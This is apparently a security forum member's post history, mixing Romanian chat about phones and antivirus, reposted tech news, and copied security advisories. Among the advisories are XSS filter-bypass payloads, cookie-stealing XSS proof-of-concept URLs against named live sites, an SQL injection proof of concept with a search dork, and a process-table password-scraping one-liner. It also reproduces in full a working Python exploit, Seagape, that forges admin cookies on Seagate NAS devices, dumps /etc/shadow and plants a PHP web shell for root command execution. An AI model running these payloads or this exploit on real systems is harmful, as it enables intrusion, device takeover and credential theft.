Jump to content

Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. Android. De ce? Pai de 3 ani folosesc windows phone si pot sa spun ca e cel mai nasol telefon. Nu gasesti aplicatii/jocuri cum gasesti pentru Android, anul asta am sa-l schimb si eu Sfat: Daca vrei sa iti cumperi un telefon atunci NU alege WP.
  2. Cum poti spune ca AVG e mai bun? AVG e o porcarie/posirca ( daca vrei sa te virusezi baga AVG )
  3. @Catalin.A ramai la Avast free, cred ca asta o sa iti spuna toti de pe aici. ( Bitdefender-ul iti omoara pc-ul )
  4. Another XSS auditor bypass This bug is similar to the last one I posted but executes in a different context. It requires an existing script after the injection because we use it to close the injected script. It’s a shame chrome doesn’t support self closing scripts in HTML or within a SVG element because I’m pretty sure I could bypass it without using an existing script. Anyway the injection uses a data url with a script. In order to bypass the filter we need to concat the string with the quote from the attribute or use html entities such as: //. EX: %22%3E%3Cscript/src=data:,alert(1)%26sol;%26sol; The HTML parser doesn’t care how much junk is between the opening and closing script since we are using a src attribute. P.O.C http://challenge.hackvertor.co.uk/script3.php?x=%22%3E%3Cscript/src=data:,alert(1)%2b%22 P.O.C http://challenge.hackvertor.co.uk/script3.php?x=%22%3E%3Cscript/src=data:,alert(1)%26sol;%26sol; Source
  5. Services Affected: http://www.Rackspace.com Threat Level: High Severity: High CVSS Severity Score: 7.0 Impact type: Complete confidentiality, integrity and availability violation. Vulnerability: (2) Unauthenticated Cross-Site Scripting Vulnerabilities / HTML Injections (2) Filtration Bypass Vendor Overview Rackspace Inc. is a managed cloud computing company based in Windcrest, Texas, USA a suburb of San Antonio, Texas. The company has offices in Australia, U.K, Switzerland, Israel, The Netherlands, India and Hong Kong; with data centers located in various states such as Texas, Illinois, Virginia. Rackspace is the global leader in hybrid cloud and the founder of OpenStack, the open-source operating system for the cloud. [1] The company was founded in 1998 by Richard Yoo and Dirk Elmendorf in San Antonio, Texas. [1] Proof of Concept http://www.rackspace.com/information/legal/copyrights_trademarks?"></script><script>alert(String.fromCh arCode(65,73,83));alert("Security");alert("Corporation");prompt("Enter-Password:");</script> Proof of Concept http://www.rackspace.com/pt/information/legal/mailterms?'"-- ></style></script><script>alert(String.fromcharCode(65,73,83));alert(document.cookie);</script> References [1] Wikipedia (2014). Rackspace | Wikipedia Rackspace. [Online] Available at: Rackspace - Wikipedia, the free encyclopedia [Last Accessed 15 Apr. 2014] [2] OWASP Website. (2014). Cross-Site Scripting (XSS) [Online] Available at: https://www.owasp.org/index.php/Cross_site_scripting [Last Accessed 15 Apr. 2014] [3] Microsoft Corporation. (2014). Microsoft Support | How to prevent Cross-Site Scripting attacks [Online] Available at: How to prevent cross-site scripting security issues [Last Accessed 15 Apr. 2014] Read more: http://dl.packetstormsecurity.net/1502-exploits/Rackspace-Report.pdf
  6. Advisory: Stored XSS-Vulnerabilities in MyBB v. 1.8.3 Advisory ID: SROEADV-2015-15 Author: Steffen Rösemann Affected Software: MyBB v. 1.8.3 Vendor URL: http://www.mybb.com Vendor Status: patched CVE-ID: - ========================== Vulnerability Description: ========================== MyBB v. 1.8.3 suffers from multiple stored XSS-vulnerabilities in the administrative backend. ================== Technical Details: ================== The stored XSS-vulnerabilities can be found in different modules in the following locations of a common MyBB installation: ====================== Module "config-attachment_types" ====================== via form-field MIME-type: http://{TARGET}/admin/index.php?module=config-attachment_types&action=add executed in: e.g. http:// {TARGET}/admin/index.php?module=config-attachment_types =============== Module "config-mycode" =============== via form fields "title" and "short description": http://{TARGET}/admin/index.php?module=config-mycode&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=config-mycode =================== Module "forum-management" =================== via form field "title": http://{TARGET}/admin/index.php?module=forum-management&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=forum ============== Module "user-groups" ============== via form fields "title" and/or "short description": http://{TARGET}/admin/index.php?module=user-groups&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=user-groups ================ Module "style-templates" ================ via form field "name": http://{TARGET}/admin/index.php?module=style-templates&action=add_set executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates ==================================== Module "style-templates" in action "add_template_group" ==================================== via form field "title": http:// {TARGET}/admin/index.php?module=style-templates&action=add_template_group executed in: e.g. http:// {TARGET}/admin/index.php?module=style-templates&sid={TEMPLATES_NUMERIC_ID} ============= Module "tool-tasks" ============= via form field "title": http://{TARGET}/admin/index.php?module=tools-tasks&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ================= Module "config-post_icons" ================= via form field "name": http://{TARGET}/admin/index.php?module=config-post_icons&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ============= Module "user-titles" ============= via form field "title to assign": http://{TARGET}/admin/index.php?module=user-titles&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ================ Module "config-banning" ================ via form field "username": http://{TARGET}/admin/index.php?module=config-banning&type=usernames executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ========= Solution: ========= Upgrade to v. 1.8.4. ==================== Disclosure Timeline: ==================== 02/03-Feb-2015 – found the vulnerabilities 03-Feb-2015 - informed the developers according to their security issue rules (see [3]) 03-Feb-2015 – release date of this security advisory [without technical details] 03-Feb-2015 - vendor replied, issues will be patched 15-Feb-2015 - vendor released patch v. 1.8.4 (see [4]) 19-Feb-2015 - release date of this security advisory 19-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://www.mybb.com [2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-15.html [3] http://www.mybb.com/get-involved/security/ [4] http://blog.mybb.com/2015/02/15/mybb-1-8-4-released-feature-update-security-maintenance-release/ Source
  7. Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure Author: Larry W. Cashdollar, @_larry0 Date: 2015-02-17 Download Site: https://rubygems.org/gems/xaviershay-dm-rails Vendor: Martin Gamsjaeger, Dan Kubb Vendor Notified: 2015-02-17 Vendor Contact: notreal [at] rhnh.net Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically. Vulnerability: The problem is with the execute function exposing the user credentials to the process table. Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb: def execute(statement) system( 'mysql', (username.blank? ? '' : "--user=#{username}"), (password.blank? ? '' : "--password=#{password}"), '-e', statement ) end OSVDB:118579 Exploit Code: • $ while (true) do ps -ef |grep [p]assword; done Advisory: http://www.vapid.dhs.org/advisory.php?v=115 Source
  8. # Affected software: http://demo.seotoaster.com # Type of vulnerability: clickjacking # Version: E-Commerce 2.2.0 # URL: http://www.seotoaster.com/ # Discovered by: Provensec # Website: http://www.provensec.com # Description:Free SEO Software & CMS: All in One # Proof of concept seo toaster search filed was vuln to xss http://demo.seotoaster.com/search-results.html?search=%3C%2Fscript%3E%3Cscript%3Ealert%28/provensec/%29%3C%2Fscript%3E Source
  9. Document Title: =============== Data Source: Scopus CMS - SQL Injection Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1436 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1436 Common Vulnerability Scoring System: ==================================== 8.9 Abstract Advisory Information: ============================== An independent security team of the vulnerability laboratory discovered a critical sql injection web vulnerability in the official Data Source Scopus Content Management System. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official Data Source Scopus Content Management System. The vulnerability allows remote attacker to inject own sql commands to compromise the affected database management system. The vulnerability is located in the `w` value of the `countrysearch.php` file. Remote attackers are able to compromise the application & dbms by manipulation of the `w` value in the `countrysearch.php` file. The issue is a classic order by injection. The request method to inject own commands is GET and the issue is located on the applicaiton-side of the service. The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9. Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable File(s): [+] countrysearch.php Vulnerable Parameter(s): [+] w Proof of Concept (PoC): ======================= The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Example http://[localhost]/[PATH]/[FILE].php?w=-[SQL INJECCTION VULNERABILITY]'-- PoC: Demonstration http://www.server.com/countrysearch.php?w=world%27-[SQL INJECCTION VULNERABILITY]'-- Dork(s): inurl:".php?w=" Solution - Fix & Patch: ======================= The vulnerability can be patched by usage of the preapred statement in connection with a secure encode/parse of the w value in the countrysearch.php file. Restrict the w value input and filter by disallowing input of special chars or negative values. Disable php script error(0);! Security Risk: ============== The security risk of the remote sql injection web vulnerability in the countrysearch.php file is estimated as critical. Credits & Authors: ================== [GuardIran Security Team] P0!s0nC0d3 - (http://www.guardiran.org) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  10. #!/usr/bin/env python # # Seagape # ======= # Seagate Business NAS pre-authentication remote code execution # exploit as root user. # # by OJ Reeves (@TheColonial) - for full details please see # https://beyondbinary.io/advisory/seagate-nas-rce/ # # Usage # ===== # seagape.py <ip> <port> [-c [ua]] # # - ip : ip or host name of the target NAS # - port : port of the admin web ui # - -c : (optional) create a cookie which will give admin access. # Not specifying this flag results in webshell installation. # - ua : (optional) the user agent used by the browser for the # admin session (UA must match the target browser). # Default value is listed below # # Example # ======= # Install and interact with the web shell: # seagape.py 192.168.0.1 80 # # Create admin cookie # seagape.py 192.168.0.1 80 -c import base64 import hashlib import itertools import os import re import socket import sys import urllib import urllib2 import uuid import xml.sax.saxutils if len(sys.argv) < 3: print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0]) sys.exit(1) # Every Seagate nas has the same XOR key. Great. XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07' # This is the User agent we'll use for most of the requests DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' # This is the description we're going to be reading from LFI_FILE = '/etc/devicedesc' # the base globals that will hold our state host = sys.argv[1] port = int(sys.argv[2]) cis = '' hostname = '' webshell = str(uuid.uuid1()) + ".php" def chunks(s, n): for i in xrange(0, len(s), n): yield s[i:i + n] def forward_interleave(a, : return ''.join(itertools.chain(*zip(itertools.cycle(a), )) def xor(s, k): return ''.join(chr(ord(a) ^ ord() for a, b in itertools.izip(s, itertools.cycle(k))) def sha1(s): return hashlib.sha1(s).hexdigest() def decode(s): f = xor(s, XOR_KEY) return ''.join(chr(ord(a) ^ ord() for a, b in chunks(f, 2)) def encode(s): s = forward_interleave(sha1(s), s) s = ''.join(a + chr(ord(a) ^ ord() for a, b in chunks(s, 2)) return xor(s, XOR_KEY) def make_request(uri = "/", ci_session = None, headers = None, post_data = None): method = 'GET' if not headers: headers = {} headers['Host'] = host if 'User-Agent' not in headers: headers['User-Agent'] = DEFAULT_UA if 'Accept' not in headers: headers['Accept'] = 'text/html' if post_data: method = 'POST' post_data = urllib.urlencode(post_data) headers['Content-Type'] = 'application/x-www-form-urlencoded' if ci_session: ci_session = urllib.quote(base64.b64encode(encode(ci_session))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) http = "" http += "{0} {1} HTTP/1.1\r\n".format(method, uri) for h in headers: http += "{0}: {1}\r\n".format(h, headers[h]) if post_data: http += "Content-Length: {0}\r\n".format(len(post_data)) http += "\r\n" if post_data: http += post_data s.send(http) result = "" while True: data = s.recv(1024) if not data: break result += data s.close() return result def get_ci_session(): resp = make_request() for l in resp.split("\r\n"): m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l) for name, value in m: if name == 'ci_session' and len(value) > 40: return decode(base64.b64decode(urllib.unquote(value))) print "Unable to establish session with {0}".format(host) sys.exit(1) def add_string(ci_session, key, value): prefix = 's:{0}:"{1}";s:'.format(len(key), key) if prefix in ci_session: ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session) else: # doesn't exist, so we need to add it to the start and the end. count = int(ci_session.split(':')[1]) + 1 ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session) return ci_session def set_admin(ci_session): return add_string(ci_session, "is_admin", "yes") def set_language(ci_session, lang): return add_string(ci_session, "language", lang) def include_file(ci_session, file_path): if file_path[0] == '/': file_path = '../../../../../..' + file_path return set_language(ci_session, file_path + "\x00") def read_file(file_path, post_data = None): resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data) return resp def hashdump(): shadow = read_file('/etc/shadow') for l in shadow.split("\n"): if l and ':!:' not in l and ':' not in l: parts = l.split(':') print "{0}:{1}".format(parts[0], parts[1]) def cmd(command): headers = { 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept' : '*/*', 'User-Agent' : DEFAULT_UA } post_data = urllib.urlencode({'c' : command}) headers['Content-Type'] = 'application/x-www-form-urlencoded' ci_session = urllib.quote(base64.b64encode(encode(cis))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) url = 'http://{0}:{1}/{2}'.format(host, port, webshell) req = urllib2.Request(url, headers = headers, data = post_data) return urllib2.urlopen(req).read() def shell(): running = True while running: c = raw_input("Shell ({0}) $ ".format(post_id)) if c != 'quit' and c != 'exit': cmd(c) else: running = False def show_admin_cookie(user_agent): ci_session = add_string(cis, 'is_admin', 'yes') ci_session = add_string(ci_session, 'username', 'admin') ci_session = add_string(ci_session, 'user_agent', user_agent) ci_session = urllib.quote(base64.b64encode(encode(ci_session))) print "Session cookies are bound to the browser's user agent." print "Using user agent: " + user_agent print "ci_session=" + ci_session def show_version(): print "Firmware Version: {0}".format(get_firmware_version()) def show_cookie(): print cis def show_help(): print "" print "Seagape v1.0 -- Interactive Seagate NAS Webshell" print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/" print " - https://beyondbinary.io/bbsec/001" print "===========================================================================" print "version - Print the current firmware version to screen." print "dumpcookie - Print the current cookie to screen." print "admincookie <ua> - Create an admin login cookie (ua == user agent string)." print " Add to your browser and access ANY NAS box as admin." print "help - Show this help." print "exit / quit - Run for the hills." print "<anything else> - Execute the command on the server." print "" def execute(user_input): result = True parts = user_input.split(' ') c = parts[0] if c == 'admincookie': ua = DEFAULT_UA if len(parts) > 1: ua = ' '.join(parts[1:]) show_admin_cookie(ua) elif c == 'dumpcookie': show_cookie() elif c == 'version': show_version() elif c == 'help': show_help() elif c == 'quit' or c == 'exit': remove_shell() result = False else: print cmd(user_input) return result def get_firmware_version(): resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043", ci_session = acis) return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2] def install_shell(): resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043", ci_session = acis) existing_setup = '' for l in resp.split("\r\n"): if 'general_setup' in l: existing_setup = l break # generate the shell and its installer exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>") installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post) write_php = xml.sax.saxutils.quoteattr(installer)[1:-1] start = existing_setup.index('" description="') + 15 end = existing_setup.index('"', start) updated_setup = existing_setup[0:start] + write_php + existing_setup[end:] # write the shell to the description resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : updated_setup }) # invoke the installer read_file(LFI_FILE) # remove the installer resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : existing_setup }) def remove_shell(): return cmd('rm -f {0}'.format(webshell)) print "Establishing session with {0} ...".format(host) cis = get_ci_session() if len(sys.argv) >= 4 and sys.argv[3] == '-c': ua = DEFAULT_UA if len(sys.argv) > 4: ua = sys.argv[4] show_admin_cookie(ua) else: print "Configuring administrative access ..." acis = add_string(cis, 'is_admin', 'yes') acis = add_string(acis, 'username', 'admin') print "Installing web shell (takes a while) ..." install_shell() print "Extracting id and hostname ..." identity = cmd('whoami').strip() hostname = cmd('cat /etc/hostname').strip() show_help() running = True while running: try: user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname)) running = execute(user_input) except: print "Something went wrong. Try again." Source
  11. Update to Maligno 2.0 Changes: Adversary replication functionality improvements. POST and HEAD method support added, new client profile added, server multithreading support added, perpetual shell mode added, client static HTTP(S) proxy support added, documentation and stability improvements. sha-256sum: 546b134942e14428952c2ca513d63be123eda20b6838f21a030ccbaee216ac44 Download
  12. Aerosol

    Salut

    Ma refer pe ce ai vrea sa te axezi. Pentesting / Cracking ( Brute etc... ) Programare ?
  13. Aerosol

    Salut

    Salut @adrian94. "Cum ai ajuns pe RST?" -ce cunostiinte ai? ( ce te pasioneaza mai exact ? )
  14. @Faciubici daca pierdeai macar 5 minute din timpul tau alocat offtopic-ului observai ca initial functiona DOAR PE CHROME, firefox & Opera mai nou. Te rog frumos nu-mi mai umple topicurile cu posturile tale fara sens. Multumesc. Citeste macar titlul: WhatsApp Web Client Now Available on Firefox and Opera Browsers
  15. @Che , din cate vezi eu am Titlu si nu postez doar stiri, programe, tutoriale, scripturi, exploit-uri etc. Oricum e bine cum e acum, "Registered User " practic e si imposibila aceasta sugestie. Doar nu o sa stea un administrator sa verifice fiecare user...
  16. Search -> ( daca te uiti la sursa nu e veche de acum o luna ci de acum cateva zile ) Daca nu aveti ceva care sa fie on-topic, va rog sa va abtineti.
  17. New Generations usually bring new base technologies, more network capacity for more data per user, and high speed Internet service, for which Internet service providers usually advertise. However, it is believed that the fifth generation (5G Technology) of mobile network will be beyond our thoughts. 1TBPS OVER 5G Security researchers from the University of Surrey have just achieved Record-Breaking data speeds during a recent test of 5G wireless data connections, achieving an incredible One Terabit per second (1Tbps) speed – many thousands of times faster than the existing 4G connections. After 4G, 5G is the next generation of mobile communication technology that aims at offering far greater capacity and be faster, more energy-efficient and more cost-effective than anything that has seen before. The boffins say 5G will be different – very different. The 5G test was conducted at the university's 5G Innovation Centre (5GIC), which was founded by a host of telecoms industry partners including Huawei, Fujitsu, Samsung, Vodafone, EE, Aircom, BT, Telefonica, Aeroflex, BBC and Rohde & Schwarz. DOWNLOAD 100 MOVIES IN JUST 3 SECONDS 1Tbps of speeds are far faster than previously announced 5G tests – Samsung’s 7.5 gigabits per second (Gbps) record, which was 30 times faster than 4G LTE (Long-Term Evolution) speed and just less than 1% of the Surrey team's speed. With 1Tbps, it is possible to download a file 100 times the size of a feature film in just three seconds. This incredible speed is over 65,000 times faster than the current 4G download speeds. 5G EXPECTED TO ROLL OUT BY 2020 The test was carried out over a distance of 100 meters using equipment built at the university. The head of the 5GIC said he planned to demonstrate the technology to the public in 2018. It’s believed that 5G could possibly be available in the UK by 2020. UK communications regulator Ofcom has been supportive of efforts to get 5G to the public. Ofcom previously said it expected 5G mobile should be able to deliver speeds between 10 and 50Gbps, compared with the 4G average download speed of 15 Megabits per second (Mbps). There is a need to bring "end-to-end latency down to below one millisecond" in order to enable latest technologies and applications which would just not be possible with 4G. Tafazolli mentioned 3D holographic chess games on smartphones, controlling connected cars over 5G and other possible future applications requiring such low latency. 5G – NEW FRONTIER FOR CYBER ATTACKS 5G will, no doubt, provide a high speed Internet connectivity that would be really a great news for all, but that would be a distinction for cyber criminals as well. In Future, by leveraging 5G technology, it would be very easy for hackers and cybercriminals to take down almost any website on the Internet using Distributed Denial of Service (DDoS) attacks. In Era of expected 50Gbps Internet speed at home or business, there would be no need for cyber criminals to make a critical infrastructure of botnets by compromising hundreds of thousands of devices, rather they only need few devices with 5G Internet connection to launch the ever largest DDoS attack of around 1 Tbps. To resolve such issues in future, High speed Internet service providers and online communications service providers need to setup real time monitoring, reporting, limiting, and mitigation and protection mechanism against DDoS attacks in an attempt to protect online users. Source
  18. It's been a long time coming, but now the users of Firefox and Opera browsers don’t need to rely on the Chrome browser to access WhatsApp Web client, as the most popular smartphone messaging service has announced that the Web-based version of its service now works on Firefox and Opera web browsers too. WHATSAPP WEB AVAILABLE FOR OPERA & FIREFOX Almost a month ago, WhatsApp launched the web client of its service but the access was limited only to the Google Chrome users. Now, the company is giving more choices to desktop users by launching WhatsApp Web Today for Opera and Firefox browsers, though you’ll still have to wait a little long if you’re a Safari user. WhatsApp Web is nothing than an extension of the core mobile WhatsApp application. It syncs conversations from your smartphone devices to your PCs, with everything stored on the mobile device itself. HOW TO USE WHATSAPP ON PC/DESKTOP In order to install WhatsApp web in your PC or laptop running Google Chrome, Mozilla Firefox or Opera browsers, you need to follow same steps, as the sign-up process is the same as with Chrome browser: Interested WhatsApp users simply need to open Chrome and navigate to WhatsApp Web A QR code will appear on the web page, which must be scanned using WhatsApp mobile application to activate the service. By scanning the QR code that appears, users will automatically have paired their mobile WhatsApp with the WhatsApp web client, as shown. For now, WhatsApp Web only works with Android, Windows Phone and BlackBerry devices, but unfortunately, iPhones still don't have the capability to scan the WhatsApp Web QR code because there's no web solution at this time for iOS users because of limitations of the platform. Currently, WhatsApp has 700 million users sending 30 billion messages per day, and is bigger than most of its competitors, including Facebook Messenger, Line and WeChat. Now, this new WhatsApp web client available for a wider range of browsers will definitely increase its market. Source
  19. Seagate, a popular vendor of hardware solutions, has a critical zero-day vulnerability in its Network Attached Storage (NAS) device software that possibly left thousands of its users vulnerable to hackers. Seagate's Business Storage 2-Bay NAS product, found in home and business networks, is vulnerable to a zero-day Remote Code Execution vulnerability, currently affecting more than 2,500 publicly exposed devices on the Internet. Seagate is one of the world’s largest vendor of hardware solutions, with products available worldwide. After Western Digital, Seagate ranked second and holds 41% of the market worldwide in supplying storage hardware products. A security researcher, named OJ Reeves, discovered the zero-day remote code execution vulnerability on 7th October last year and, reported to the company totally in the white hat style. But even after 130 days of responsible disclosure, the zero-day bug remains unpatched till now. In order to exploit the vulnerability, an attacker needs to be on the same network as the vulnerable device which gives the attacker root access of the vulnerable device, without the need of a valid login. Reeves also released a python exploit along with its Metasploit module version which is available on Github. ORIGIN OF ZERO-DAY VULNERABILITY Seagate's Business Storage 2-Bay NAS products come with a web-enabled management application that lets administrators to perform device configuration functions such as adding users, setting up access control, managing files, and more. This web application is built with three core technologies, including PHP version 5.2.13, CodeIgniter version 2.1.0 and Lighttpd version 1.4.28, which are all out-dated versions. PHP version 5.2.13 is vulnerable (CVE-2006-7243) that allows user-controlled data to prematurely terminate file paths, allowing for full control over the file extension. CodeIgniter version prior to 2.2.0 is vulnerable (CVE-2014-8686) that allows an attacker to extract the encryption key and decrypt the content of the cookie. Once decrypted, attacker can modify the content of the cookie and re-encrypt it prior to submitting it back to the server. The custom web application authenticate the login user based upon browser cookies, having three parameters: username: logged in user name is_admin: user is admin or not i.e. Yes or No language: chosen language (eg. en_US) Researcher explained that there is no further validation of user credentials at server-end, once username cookie is established, which could be impersonated easily by an attacker. Another parameter 'is_admin' can be manipulated to 'Yes' value that allows the attacker to self-elevate to administrative privileges in the web application itself. The language parameter can be manipulated for exploitation of a local file inclusion vulnerability. At last, the web application is being executed by an instance of Lighttpd which is running under the context of the root user. When an attacker makes a request with the manipulated cookie, it results in arbitrary code execution as root user. Therefore, successful exploitation of this vulnerability could result in taking complete control of the vulnerable device as a root user. VULNERABLE PRODUCTS Two different network storage devices made by Seagate were tested and found to be vulnerable. The latest Seagate NAS firmware version listed below are affected by this zero-day vulnerability: Business Storage 2-Bay NAS version 2014.00319 Business Storage 2-Bay NAS version 2013.60311 However, Reeves believes that all versions of Business Storage 2-Bay NAS product prior to 2014.00319 are affected by the same vulnerability. METASPLOIT MODULE AVAILABLE A Metasploit module and a Python script to exploit the vulnerability automatically is available on the Github. Each of these scripts are able to perform the following tasks: Connects to the vulnerable NAS device and extracts a ci_session cookie. Decrypts the cookie using the static encryption key and extracts the PHP hash. Modifies the serialized PHP hash so that the username is set to 'admin' and the is_admin field is set to 'yes'. Encrypts this updated PHP hash ready for further use as a ci_session cookie, which allows future requests to operate on the NAS as if they were an administrator. Performs a request to extract the host configuration, which includes the device's description. Modifies the host configuration so that the device description contains a small stager payload. Performs a request to update the host configuration with the new data so that the stager payload is written to /etc/devicedesc. Modifies the PHP hash again so that the language parameter contains the value ../../../../etc/devicedesc\x00. Encrypts this new PHP hash ready for future use as a ci_session cookie. Performs a request to the NAS using the cookie created in the previous step, which invokes the stager that was written to disk. This request posts a larger payload which is written to disk under the web server root. Performs another request which then resets the host configuration back to what it was prior to exploitation. According to Reeves, there was no updated firmware version available for download that contains patches for the issues, even after contacting the company multiple times. Users of Seagate's Business Storage NAS products and and other products using vulnerable firmware are recommended to ensure that their devices are not accessible via the public Internet and that the devices be located behind a firewall configured to allow only a trusted set of IP addresses to connect to the web interface. Source
  20. Do you know that your Facebook account can be accessed by Facebook engineers and that too without entering your account credentials? Recent details provided by the social network giant show who can access your Facebook account and when. No doubt, Facebook and other big tech companies including Google, Apple and Yahoo! are trying to keep their data out of reach from law enforcement and spies agencies by adopting encrypted communication and end-to-end encryption solutions in near future, but right now they have access to your personal data, and at least few of their employees can access it with one click. Earlier this week, director at the record label Anjunabeats, Paavo Siljamäki, brought attention to this issue by posting a very interesting story on his Facebook wall. During his visit to Facebook office in LA, a Facebook engineer logged into his Facebook account after his permission, but the strange part — they did it without asking him for the password. ACCESS WITHOUT NOTIFICATION Facebook even didn’t notify Siljamäki that someone else accessed his private Facebook profile, as the company does when your Facebook account is accessed from any new device or from a different Geo-location. Siljamäki got in contact with Facebook in order to know how many of Facebook's staff have this kind of 'master' access to anyone's Facebook account and when exactly they can access users’ private data, and also, how would anyone know if his/her Facebook account has been accessed. When the social network giant asked about how the employee got access to user’s Facebook account without entering the account credentials, Facebook issued the following statement: WHO CAN ACCESS MY FACEBOOK ACCOUNT? The company didn’t explain exactly who can access what, but it assured its users that the accounts access is tiered and limited to specific job function. The access to accounts are granted to most employees in order to reply to a customer request for information or error report. In short, the social network giant has a customer service tool that can grant Facebook employees access to a user’s account. Facebook runs two separate monitoring systems that generate weekly reports on suspicious behavior which are then reviewed and analyses by two independent security teams, specifically a selected group of employees. Facebook gives a strict warning when hired employees to use this tool and fired any employee directly who abuse it. So, you need not to worry about Mark Zuckerberg accessing your account, unless you yourself ask Facebook for help with something and have given permission. Source
  21. Apparently no vulnerability is too small, no application too obscure, to escape a hacker’s notice. A honeypot run by Trustwave’s SpiderLabs research team recently snared an automated attack targeting users of the open source Rejetto HTTP File Server (Rejetto HFS). Someone was trying to exploit a vulnerability—which has since been patched—and install the well-known distributed denial-of-service tool IptabLes (unrelated to the Linux tool), also known as IptabLex. Rejetto HFS has been downloaded more than 24,000 times in the last seven days and according to the project’s website has an estimated 12,500 users and is used as a file-sharing application as well as a webserver. It also runs on Wine, the Windows emulator for Linux systems. “This is just one snapshot, one request. This is one example to extrapolate and take a higher level view; there’s likely a lot more activity out there,” said Ryan Barnett, SpiderLabs lead researcher. It’s likely the attackers have simply incorporated this exploit into a larger attack platform, Barnett said. “That’s the value of honeypots, spotting automated tools scanning the Internet shot-gunning exploits, and hoping it works,” Barnett said. The exploit, sent from a possible compromised IP address in China, was targeting CVE-2014-6287, a remote code execution bug in Rejetto. Specifically, the vulnerability affects Rejetto versions prior to 2.3c; the vulnerability is in the findMacroMarker function. Barnett said the exploit relies on a null byte character to trigger the attack code, which is written in Microsoft VBScript. Once the exploit executes, it tries to connect to a pair of IP addresses hosted in Paris (123[.]108.109.100 and 178[.]33.196.164) on three ports: 80 (HTTP); 53 (DNS); and 443 (HTTPS). Barnett said only 178[.]33.196.164 